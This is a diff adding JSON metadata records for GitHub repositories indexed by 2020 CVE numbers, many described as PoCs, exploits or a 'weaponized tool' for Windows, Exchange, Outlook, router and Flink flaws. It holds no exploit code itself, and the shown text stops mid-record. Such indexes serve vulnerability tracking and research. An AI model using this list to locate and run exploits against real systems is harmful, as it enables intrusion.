"https:\/\/github.com\/komomon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/komomon\/CVE-2020-16898-EXP-POC", + "description": "CVE-2020-16898 Windows TCP\/IP远程代码执行漏洞 EXP&POC", + "fork": false, + "created_at": "2020-10-20T05:24:47Z", + "updated_at": "2023-11-08T06:40:28Z", + "pushed_at": "2020-10-28T11:21:00Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 307994197, + "name": "CVE-2020-16898--EXP-POC", + "full_name": "komomon\/CVE-2020-16898--EXP-POC", + "owner": { + "login": "komomon", + "id": 52700174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52700174?v=4", + "html_url": "https:\/\/github.com\/komomon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/komomon\/CVE-2020-16898--EXP-POC", + "description": "CVE-2020-16898 Windows TCP\/IP远程代码执行漏洞 EXP&POC", + "fork": false, + "created_at": "2020-10-28T11:25:58Z", + "updated_at": "2024-08-12T20:07:09Z", + "pushed_at": "2020-10-28T11:27:17Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-16899.json b/2020/CVE-2020-16899.json new file mode 100644 index 0000000000..b71ea07358 --- /dev/null +++ b/2020/CVE-2020-16899.json @@ -0,0 +1,51 @@ +[ + { + "id": 303511670, + "name": "CVE-2020-16899", + "full_name": "advanced-threat-research\/CVE-2020-16899", + "owner": { + "login": "advanced-threat-research", + "id": 27901279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27901279?v=4", + "html_url": "https:\/\/github.com\/advanced-threat-research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/advanced-threat-research\/CVE-2020-16899", + "description": "CVE-2020-16899 - Microsoft Windows TCP\/IP Vulnerability Detection Logic and Rule", + "fork": false, + "created_at": "2020-10-12T20:59:03Z", + "updated_at": "2024-11-04T19:19:38Z", + "pushed_at": "2020-10-19T13:58:46Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atr", + "buffer-overflow", + "buffer-overflow-vulnerability", + "cve", + "cve-2020-16899", + "icmpv6", + "lua", + "mcafee", + "microsoft", + "neighbor-discovery", + "neighbor-discovery-protocol", + "rce", + "suricata", + "suricata-rule", + "tcpip-stack", + "vulnerability", + "windows-10" + ], + "visibility": "public", + "forks": 9, + "watchers": 21, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-16938.json b/2020/CVE-2020-16938.json new file mode 100644 index 0000000000..6d92ff00e9 --- /dev/null +++ b/2020/CVE-2020-16938.json @@ -0,0 +1,33 @@ +[ + { + "id": 306071294, + "name": "CVE-2020-16938", + "full_name": "ioncodes\/CVE-2020-16938", + "owner": { + "login": "ioncodes", + "id": 18533297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18533297?v=4", + "html_url": "https:\/\/github.com\/ioncodes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ioncodes\/CVE-2020-16938", + "description": "Bypassing NTFS permissions to read any files as unprivileged user.", + "fork": false, + "created_at": "2020-10-21T15:38:22Z", + "updated_at": "2024-06-21T00:08:57Z", + "pushed_at": "2020-10-21T15:39:00Z", + "stargazers_count": 187, + "watchers_count": 187, + "has_discussions": false, + "forks_count": 40, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 40, + "watchers": 187, + "score": 0, + "subscribers_count": 10 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-16939.json b/2020/CVE-2020-16939.json new file mode 100644 index 0000000000..109302b821 --- /dev/null +++ b/2020/CVE-2020-16939.json @@ -0,0 +1,33 @@ +[ + { + "id": 303857222, + "name": "CVE-2020-16939", + "full_name": "rogue-kdc\/CVE-2020-16939", + "owner": { + "login": "rogue-kdc", + "id": 49311295, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49311295?v=4", + "html_url": "https:\/\/github.com\/rogue-kdc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rogue-kdc\/CVE-2020-16939", + "description": "PoC code for CVE-2020-16939 Windows Group Policy DACL Overwrite Privilege Escalation", + "fork": false, + "created_at": "2020-10-14T00:03:49Z", + "updated_at": "2024-08-12T20:06:44Z", + "pushed_at": "2020-10-27T16:42:14Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-16947.json b/2020/CVE-2020-16947.json new file mode 100644 index 0000000000..ec86422d6f --- /dev/null +++ b/2020/CVE-2020-16947.json @@ -0,0 +1,64 @@ +[ + { + "id": 304353448, + "name": "CVE-2020-16947", + "full_name": "0neb1n\/CVE-2020-16947", + "owner": { + "login": "0neb1n", + "id": 22587350, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22587350?v=4", + "html_url": "https:\/\/github.com\/0neb1n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0neb1n\/CVE-2020-16947", + "description": "PoC of CVE-2020-16947 (Microsoft Outlook RCE vulnerablility)", + "fork": false, + "created_at": "2020-10-15T14:32:25Z", + "updated_at": "2024-08-12T20:06:47Z", + "pushed_at": "2020-10-20T20:09:58Z", + "stargazers_count": 125, + "watchers_count": 125, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 35, + "watchers": 125, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 314771487, + "name": "CVE-2020-16947", + "full_name": "MasterSploit\/CVE-2020-16947", + "owner": { + "login": "MasterSploit", + "id": 74764997, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74764997?v=4", + "html_url": "https:\/\/github.com\/MasterSploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MasterSploit\/CVE-2020-16947", + "description": "Outlook 2019 Remote Command Execution", + "fork": false, + "created_at": "2020-11-21T08:58:32Z", + "updated_at": "2024-04-01T14:50:42Z", + "pushed_at": "2020-11-21T09:09:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17008.json b/2020/CVE-2020-17008.json new file mode 100644 index 0000000000..aed0d7c5b2 --- /dev/null +++ b/2020/CVE-2020-17008.json @@ -0,0 +1,33 @@ +[ + { + "id": 324061019, + "name": "CVE-2020-17008", + "full_name": "jas502n\/CVE-2020-17008", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2020-17008", + "description": "CVE-2020-17008 splWOW64 Elevation of Privilege", + "fork": false, + "created_at": "2020-12-24T04:00:29Z", + "updated_at": "2024-08-12T20:08:48Z", + "pushed_at": "2020-12-24T06:02:53Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 49, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17035.json b/2020/CVE-2020-17035.json new file mode 100644 index 0000000000..7a4e272ef9 --- /dev/null +++ b/2020/CVE-2020-17035.json @@ -0,0 +1,33 @@ +[ + { + "id": 324947158, + "name": "CVE-2020-17035-patch-analysis", + "full_name": "flamelu\/CVE-2020-17035-patch-analysis", + "owner": { + "login": "flamelu", + "id": 51046996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51046996?v=4", + "html_url": "https:\/\/github.com\/flamelu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/flamelu\/CVE-2020-17035-patch-analysis", + "description": "CVE-2020-17035 patch analysis", + "fork": false, + "created_at": "2020-12-28T07:50:00Z", + "updated_at": "2022-07-23T07:58:13Z", + "pushed_at": "2020-12-28T08:13:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17057.json b/2020/CVE-2020-17057.json new file mode 100644 index 0000000000..5dbf9d46a7 --- /dev/null +++ b/2020/CVE-2020-17057.json @@ -0,0 +1,64 @@ +[ + { + "id": 323867944, + "name": "cve-2020-17057", + "full_name": "fengjixuchui\/cve-2020-17057", + "owner": { + "login": "fengjixuchui", + "id": 2487206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2487206?v=4", + "html_url": "https:\/\/github.com\/fengjixuchui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fengjixuchui\/cve-2020-17057", + "description": "cve-2020-17057 poc", + "fork": false, + "created_at": "2020-12-23T10:10:20Z", + "updated_at": "2020-12-23T10:10:22Z", + "pushed_at": "2020-12-23T10:08:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 341907101, + "name": "CVE-2020-17057", + "full_name": "lsw29475\/CVE-2020-17057", + "owner": { + "login": "lsw29475", + "id": 13043359, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13043359?v=4", + "html_url": "https:\/\/github.com\/lsw29475", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lsw29475\/CVE-2020-17057", + "description": null, + "fork": false, + "created_at": "2021-02-24T13:19:44Z", + "updated_at": "2022-02-14T08:03:57Z", + "pushed_at": "2021-02-25T00:18:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17086.json b/2020/CVE-2020-17086.json new file mode 100644 index 0000000000..0f6076f884 --- /dev/null +++ b/2020/CVE-2020-17086.json @@ -0,0 +1,33 @@ +[ + { + "id": 740029111, + "name": "CVE-2020-17086", + "full_name": "T81oub\/CVE-2020-17086", + "owner": { + "login": "T81oub", + "id": 93501885, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93501885?v=4", + "html_url": "https:\/\/github.com\/T81oub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/T81oub\/CVE-2020-17086", + "description": null, + "fork": false, + "created_at": "2024-01-07T09:58:39Z", + "updated_at": "2024-01-07T10:07:37Z", + "pushed_at": "2024-01-07T09:59:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17087.json b/2020/CVE-2020-17087.json new file mode 100644 index 0000000000..a4e64f81ce --- /dev/null +++ b/2020/CVE-2020-17087.json @@ -0,0 +1,126 @@ +[ + { + "id": 316112234, + "name": "CVE-2020-17087", + "full_name": "revengsh\/CVE-2020-17087", + "owner": { + "login": "revengsh", + "id": 49122088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49122088?v=4", + "html_url": "https:\/\/github.com\/revengsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/revengsh\/CVE-2020-17087", + "description": "A CVE-2020-17087 PoC.", + "fork": false, + "created_at": "2020-11-26T03:21:34Z", + "updated_at": "2023-07-22T22:49:47Z", + "pushed_at": "2020-11-26T04:21:20Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 371444911, + "name": "OHTS_IE6052-CVE-2020-17087", + "full_name": "ykg88\/OHTS_IE6052-CVE-2020-17087", + "owner": { + "login": "ykg88", + "id": 12491544, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12491544?v=4", + "html_url": "https:\/\/github.com\/ykg88", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ykg88\/OHTS_IE6052-CVE-2020-17087", + "description": null, + "fork": false, + "created_at": "2021-05-27T16:55:39Z", + "updated_at": "2021-05-27T17:18:12Z", + "pushed_at": "2021-05-27T17:18:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 382397170, + "name": "Windows-Non-Paged-Pool-Overflow-Exploitation", + "full_name": "vp777\/Windows-Non-Paged-Pool-Overflow-Exploitation", + "owner": { + "login": "vp777", + "id": 28927034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28927034?v=4", + "html_url": "https:\/\/github.com\/vp777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vp777\/Windows-Non-Paged-Pool-Overflow-Exploitation", + "description": "Techniques based on named pipes for pool overflow exploitation targeting the most recent (and oldest) Windows versions demonstrated on CVE-2020-17087 and an off-by-one overflow", + "fork": false, + "created_at": "2021-07-02T16:03:16Z", + "updated_at": "2024-11-27T18:13:32Z", + "pushed_at": "2022-09-01T06:33:36Z", + "stargazers_count": 178, + "watchers_count": 178, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 178, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 640111892, + "name": "CVE-2020-17087", + "full_name": "raiden757\/CVE-2020-17087", + "owner": { + "login": "raiden757", + "id": 129262042, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129262042?v=4", + "html_url": "https:\/\/github.com\/raiden757", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raiden757\/CVE-2020-17087", + "description": null, + "fork": false, + "created_at": "2023-05-13T03:11:42Z", + "updated_at": "2023-06-01T08:29:00Z", + "pushed_at": "2023-06-01T08:30:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17136.json b/2020/CVE-2020-17136.json new file mode 100644 index 0000000000..63fbf0d195 --- /dev/null +++ b/2020/CVE-2020-17136.json @@ -0,0 +1,64 @@ +[ + { + "id": 349044248, + "name": "CVE-2020-17136", + "full_name": "xyddnljydd\/CVE-2020-17136", + "owner": { + "login": "xyddnljydd", + "id": 28214509, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28214509?v=4", + "html_url": "https:\/\/github.com\/xyddnljydd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xyddnljydd\/CVE-2020-17136", + "description": "CVE-2020-17136 exploit", + "fork": false, + "created_at": "2021-03-18T11:16:36Z", + "updated_at": "2024-07-18T13:43:22Z", + "pushed_at": "2021-03-31T14:42:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 349138961, + "name": "CVE-2020-17136", + "full_name": "cssxn\/CVE-2020-17136", + "owner": { + "login": "cssxn", + "id": 11917920, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11917920?v=4", + "html_url": "https:\/\/github.com\/cssxn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cssxn\/CVE-2020-17136", + "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability", + "fork": false, + "created_at": "2021-03-18T16:13:23Z", + "updated_at": "2024-07-18T13:43:24Z", + "pushed_at": "2021-03-18T16:41:58Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17144.json b/2020/CVE-2020-17144.json new file mode 100644 index 0000000000..646b68c4f5 --- /dev/null +++ b/2020/CVE-2020-17144.json @@ -0,0 +1,64 @@ +[ + { + "id": 319921170, + "name": "CVE-2020-17144-EXP", + "full_name": "Airboi\/CVE-2020-17144-EXP", + "owner": { + "login": "Airboi", + "id": 28615434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28615434?v=4", + "html_url": "https:\/\/github.com\/Airboi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Airboi\/CVE-2020-17144-EXP", + "description": "Exchange2010 authorized RCE", + "fork": false, + "created_at": "2020-12-09T10:30:16Z", + "updated_at": "2024-11-16T09:35:29Z", + "pushed_at": "2020-12-24T08:11:51Z", + "stargazers_count": 155, + "watchers_count": 155, + "has_discussions": false, + "forks_count": 44, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 44, + "watchers": 155, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 320077749, + "name": "CVE-2020-17144", + "full_name": "zcgonvh\/CVE-2020-17144", + "owner": { + "login": "zcgonvh", + "id": 25787677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25787677?v=4", + "html_url": "https:\/\/github.com\/zcgonvh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zcgonvh\/CVE-2020-17144", + "description": "weaponized tool for CVE-2020-17144", + "fork": false, + "created_at": "2020-12-09T20:57:16Z", + "updated_at": "2024-10-30T16:10:01Z", + "pushed_at": "2020-12-09T20:57:32Z", + "stargazers_count": 159, + "watchers_count": 159, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 159, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17382.json b/2020/CVE-2020-17382.json new file mode 100644 index 0000000000..452981edfd --- /dev/null +++ b/2020/CVE-2020-17382.json @@ -0,0 +1,64 @@ +[ + { + "id": 296409739, + "name": "CVE-2020-17382", + "full_name": "uf0o\/CVE-2020-17382", + "owner": { + "login": "uf0o", + "id": 24236867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24236867?v=4", + "html_url": "https:\/\/github.com\/uf0o", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uf0o\/CVE-2020-17382", + "description": "PoC exploits for CVE-2020-17382", + "fork": false, + "created_at": "2020-09-17T18:26:32Z", + "updated_at": "2024-10-24T11:34:35Z", + "pushed_at": "2020-10-02T18:45:43Z", + "stargazers_count": 113, + "watchers_count": 113, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 113, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 584128166, + "name": "CVE-2020-17382", + "full_name": "houseofxyz\/CVE-2020-17382", + "owner": { + "login": "houseofxyz", + "id": 121667935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121667935?v=4", + "html_url": "https:\/\/github.com\/houseofxyz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/houseofxyz\/CVE-2020-17382", + "description": "CVE-2020-17382 Windows 10 x64 2004 Build 19041.264 Exploit", + "fork": false, + "created_at": "2023-01-01T13:49:07Z", + "updated_at": "2024-06-21T00:10:39Z", + "pushed_at": "2023-01-01T13:49:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17453.json b/2020/CVE-2020-17453.json new file mode 100644 index 0000000000..42e353c9d1 --- /dev/null +++ b/2020/CVE-2020-17453.json @@ -0,0 +1,64 @@ +[ + { + "id": 354303685, + "name": "CVE-2020-17453-PoC", + "full_name": "ydycjz6j\/CVE-2020-17453-PoC", + "owner": { + "login": "ydycjz6j", + "id": 54763344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54763344?v=4", + "html_url": "https:\/\/github.com\/ydycjz6j", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ydycjz6j\/CVE-2020-17453-PoC", + "description": "PoC (Proof of Concept) - CVE-2020-17453", + "fork": false, + "created_at": "2021-04-03T13:49:39Z", + "updated_at": "2021-04-12T07:54:29Z", + "pushed_at": "2021-04-03T13:50:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 630316300, + "name": "CVE-2020-17453", + "full_name": "karthi-the-hacker\/CVE-2020-17453", + "owner": { + "login": "karthi-the-hacker", + "id": 33289300, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33289300?v=4", + "html_url": "https:\/\/github.com\/karthi-the-hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karthi-the-hacker\/CVE-2020-17453", + "description": "CVE-2020-17453 is a powerful scanner for bug bounty hunters and penetration testers to discover vulnerabilities in their web applications.", + "fork": false, + "created_at": "2023-04-20T06:00:13Z", + "updated_at": "2024-09-10T11:18:58Z", + "pushed_at": "2023-04-22T14:18:16Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17456.json b/2020/CVE-2020-17456.json new file mode 100644 index 0000000000..ea6d79be38 --- /dev/null +++ b/2020/CVE-2020-17456.json @@ -0,0 +1,67 @@ +[ + { + "id": 331533622, + "name": "CVE-2020-17456", + "full_name": "Al1ex\/CVE-2020-17456", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-17456", + "description": "CVE-2020-17456 & Seowon SLC 130 Router RCE", + "fork": false, + "created_at": "2021-01-21T06:16:40Z", + "updated_at": "2024-08-12T20:09:37Z", + "pushed_at": "2021-01-21T06:17:00Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-17456", + "seowon-slc" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 468552106, + "name": "CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated", + "full_name": "TAPESH-TEAM\/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated", + "owner": { + "login": "TAPESH-TEAM", + "id": 83407483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83407483?v=4", + "html_url": "https:\/\/github.com\/TAPESH-TEAM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAPESH-TEAM\/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated", + "description": "Seowon SLR-120S42G RCE Exploit \/ Remote Code Execution (Unauthenticated)", + "fork": false, + "created_at": "2022-03-11T00:16:35Z", + "updated_at": "2024-08-12T20:21:26Z", + "pushed_at": "2022-03-20T23:46:16Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17496.json b/2020/CVE-2020-17496.json new file mode 100644 index 0000000000..4192c35031 --- /dev/null +++ b/2020/CVE-2020-17496.json @@ -0,0 +1,64 @@ +[ + { + "id": 288998463, + "name": "CVE-2020-17496", + "full_name": "ctlyz123\/CVE-2020-17496", + "owner": { + "login": "ctlyz123", + "id": 50359597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50359597?v=4", + "html_url": "https:\/\/github.com\/ctlyz123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ctlyz123\/CVE-2020-17496", + "description": null, + "fork": false, + "created_at": "2020-08-20T12:20:03Z", + "updated_at": "2020-09-07T14:06:34Z", + "pushed_at": "2020-08-20T12:24:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 292596829, + "name": "vBulletin_5.x-tab_panel-RCE", + "full_name": "ludy-dev\/vBulletin_5.x-tab_panel-RCE", + "owner": { + "login": "ludy-dev", + "id": 70466565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70466565?v=4", + "html_url": "https:\/\/github.com\/ludy-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ludy-dev\/vBulletin_5.x-tab_panel-RCE", + "description": "(CVE-2020-17496) vBulletin 5.x Widget_tabbedcontainer_tab_panel RCE Vuln Test script", + "fork": false, + "created_at": "2020-09-03T14:41:29Z", + "updated_at": "2023-05-16T16:34:18Z", + "pushed_at": "2020-11-07T13:03:41Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-17518.json b/2020/CVE-2020-17518.json new file mode 100644 index 0000000000..3fe5da13be --- /dev/null +++ b/2020/CVE-2020-17518.json @@ -0,0 +1,95 @@ +[ + { + "id": 327323010, + "name": "CVE-2020-17518", + "full_name": "QmF0c3UK\/CVE-2020-17518", + "owner": { + "login": "QmF0c3UK", + "id": 29447678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29447678?v=4", + "html_url": "https:\/\/github.com\/QmF0c3UK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/QmF0c3UK\/CVE-2020-17518", + "description": null, + "fork": false, + "created_at": "2021-01-06T13:40:06Z", + "updated_at": "2024-08-12T20:09:11Z", + "pushed_at": "2021-01-06T13:41:04Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 328278486, + "name": "CVE-2020-17518", + "full_name": "murataydemir\/CVE-2020-17518", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2020-17518", + "description": "[CVE-2020-17518] Apache Flink RESTful API Arbitrary File Upload via Directory Traversal", + "fork": false, + "created_at": "2021-01-10T01:12:45Z", + "updated_at": "2024-08-12T20:09:15Z", + "pushed_at": "2021-01-10T01:18:09Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 328410480, + "name": "Flink-CVE-2020-17518-getshell", + 